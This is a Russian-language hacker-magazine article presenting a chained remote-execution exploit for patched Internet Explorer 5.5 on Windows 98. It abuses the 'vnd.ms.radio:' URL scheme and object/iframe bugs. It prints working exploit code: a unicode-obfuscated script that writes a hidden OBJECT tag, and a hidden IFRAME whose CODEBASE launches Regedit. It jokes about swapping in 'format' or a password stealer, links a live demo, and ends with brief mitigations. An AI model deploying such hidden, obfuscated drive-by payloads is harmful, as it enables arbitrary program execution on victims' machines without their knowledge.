Хакер #305. Многошаговые SQL-инъекции
Дефолтовая инсталляция Internet Explorer 5.5 со всеми так называемыми патчами, сервис паками и т.п. все еще уязвима на предмет запуска файлов на удаленном
компюьтере.
Дежа вю в n'ый раз:
Соединяем все новые и старые компоненты в следующем порядке:
1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978)
2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394)
3. vnd.ms.radio: http://www.malware.com/
(собственно ошибки можно использовать и
по отдельности).
В Internet Explorer 5.5 есть встроенная радио-система. Довольно разрекламированная за бугром фишка. Эта "невероятная фишка" ослика IE использует свою собственную урл-схему, названную "vnd.ms.radio:".
Что же, давайте посмотрим на баг <object data="" type="text/html"> и на "vnd.ms.radio:" *.url как на взаимодополняющие компоненты.
Компонент 1 - юникод для вызов проги с радио:
document.writeln('\u003c\u004f\u0042\u004a\u0045\u0043\u0054\u0020\u0044\u0041\u0054\u0041\u003d\u0022\u0043\u003a\u005c\u0057\u0049\u004e\u0044\u004f\u0057\u0053\u005c\u0054\u0045\u004d\u0050\u005c\u0072\u0061\u0064\u0069\u006f\u002e\u0075\u0072\u006c\u0022\u0020\u0054\u0059\u0050\u0045\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u0022\u0020\u0057\u0049\u
0044\u0054\u0048\u003d\u0032\u0030\u0030\u0020\u0048\u0045\u0049\u0047\u0048\u0054\u003d\u0032\u0030\u0030\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u004f\u0042\u004a\u0045\u0043\u0054\u003e');
Компонент 2 - непосредственно сам запуск
любой программы на компьютере пользователя:
<IFRAME src="https://xakep.ru/wp-content/uploads/post/12269/vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT
CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\WINDOWS\Regedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100
HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME>
Соединяем... и опа! Так как урл с музычкой
не найден - в каталоге C:\WINDOWS\TEMP остается
кусок кода, который и можно потом вызвать с
помощью первого компонента, он то и
запустит любую программу на выполнение. В
данном примере запустится Regedit, но
собственно запустить можно все, что угодно -
например какой-нить format или скажем
send_me_all_your_password :)))
Работающий пример: [проверено на дефолтовых инсталляциях win98 и дефолтовых инсталляциях IE5.5, и ось, и ослик пропатчены самыми
последними заплатками] http://www.malware.com/drivel.html.
Посмотрите в исходнике как все сделано.
Замечания:
1. Работает против пропатченных виндов и IE 5.5
2. Нет возможности подключить внешний код, хотя может у кого получится 😉
3. Патч-монстр в 1.5 мегабайта датированный 9 Августом 2000 года ровным счетом ничего не делает (http://www.microsoft.com/technet/security/bulletin/MS00-055.asp)
4. Отрубите ActiveX и Scripting и переместите temp папку